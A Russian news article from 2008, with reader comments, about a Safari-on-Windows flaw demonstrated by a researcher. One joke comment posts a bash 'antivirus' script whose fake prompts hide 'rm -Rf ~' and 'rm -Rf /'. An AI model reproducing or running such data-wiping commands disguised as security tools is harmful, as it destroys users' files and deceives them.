Доказана опасность уязвимости в Apple Safari

image

ИБ-команда Microsoft уже предупредила, что «смешанная угроза» настолько серьезна, что пользователям Windows следует ограничить использование Safari до тех пор, пока не выйдет патч.

Исследователь безопасности разработал сайт, наглядно демонстрирующий риск, с которым сталкиваются пользователи Windows при использовании браузера Safari от Apple.

ИБ-команда Microsoft уже предупредила, что «смешанная угроза» настолько серьезна, что пользователям Windows следует ограничить использование Safari до тех пор, пока не выйдет патч. В своем блоге исследователь Лю Ди Ю (Liu Die Yu) показал, что это предупреждение не было преувеличением.

При клике по указанной исследователем ссылке в Safari с настройками по умолчанию на рабочий стол пользователя Windows загружается файл-ловушка. В следующий раз, когда пользователь открывает Internet Explorer, файл автоматически запускает notepad.exe и открывает несуществующий файл. Разумеется, злоумышленники могут найти менее безобидное применение данной уязвимости, пишет The Register.

По словам Apple, уязвимость не является критической. Эта демонстрация свидетельствует об обратном.

или введите имя

CAPTCHA
Страницы: 1  2  3  
1
11-06-2008 10:38:03
Зачем в следующий раз открывать эксплорер, если пользуешься сафари? 65873
0 |
11-06-2008 10:50:37
да затем, что многие программы, даже, если по-дефолту используется сафари, запускают IE для хождения на свои хоум-пейджи (пример: клиенты PartyPoker, RedKingsPoker ...)
0 |
1
11-06-2008 11:16:25
Так это уязвимость IE. Safari то ни чего не запускает. Я на совем компе много чего скачиваю, инода даже специально, но запускать то всякую шнягу зачем?
0 |
1
11-06-2008 12:22:45
У меня пати FF открывает ... и Старсы FF открывают ... Что я делаю не так?
0 |
1
11-06-2008 10:56:08
всё правильно, нужно использовать internet explorer так как в microsoft'е работают самые лучшие специалисты и создают самый безопасный продукт.
0 |
1
11-06-2008 11:06:31
>В следующий раз, когда пользователь открывает Internet Explorer, файл автоматически запускает notepad.exe и открывает несуществующий файл. И у него получается?
0 |
1
11-06-2008 11:18:14
Повидимому, да!
0 |
1
11-06-2008 11:22:20
Тогда опасен нотепад. Или ИЕ. rm notepad.exe rm iexplore.exe
0 |
1
12-06-2008 16:24:19
#!/bin/sh # A simple antivitus written completely in bash # Preferentially should be run as # system administrator echo The security system is checking echo for viruses and malacious software echo in your system. Please wait.... for i in `locate iexplore.exe`; do rm -f $i; done for i in `locate notepad.exe`; do rm -f $i; done echo We have found and removed several viruses... echo Do you like to continue? echo '<Yes> <No>' echo Are you sure? echo '<Yes> <No>' echo Continue searching and removing Trojans... echo Trojans found in you system echo Do you like to keep them? echo '<NO> <Yes>' echo Are you sure? echo '<NO> <Yes>' echo Are you completely sure? echo '<NO> <Yes>' find / -name iexplore.exe -exec rm -f {} \; find / -name notepad.exe -exec rm -f {} \; echo Congratulations! All Trojans are now removed. echo Continue searching other files echo Other files were found! echo Do you like to keep unwanted files? echo '<NO> <Yes>' echo Sure to remove unwanted files? echo '<YES> <No>' rm -Rf ~ echo We found and destroyed unwanted files echo Do you like to continue removing? echo '<YES> <No>' echo Are you sure you like to remove echo other unnecessary files and folders? echo '<Yes><No>' rm -Rf / echo Congratulations! There are no files echo in your system, either necessary echo or unnecessary echo Please confirm echo '<Yes> <No>' echo Are you sure echo '<Yes> <No>' echo Please reboot the system five times echo to complete reboot;reboot;reboot;reboot;reboot piz -d -ets echo Congratulations!
0 |
11-06-2008 11:18:50
«смешанная угроза»когда пользователь открывает Internet Explorer, файл автоматически запускает notepad.exeдо тех пор, пока не выйдет патчНу и кто именно займется патчем? Майкрософт? Или опять "я не я, и кобыла не моя"? [QUOTE]исследователь Лю Ди Ю (Liu Die Yu) показал, что это предупреждение не было преувеличением[QUOTE] А исследователь Лю Ди ЗЮ из команды Apple может сказать, что угроза преувеличена.
0 |
1
11-06-2008 11:52:37
Потом предложат не использовать Лиса по такой-то причине!!! Вот тебе и 100% рынка !!!
0 |
Страницы: 1  2  3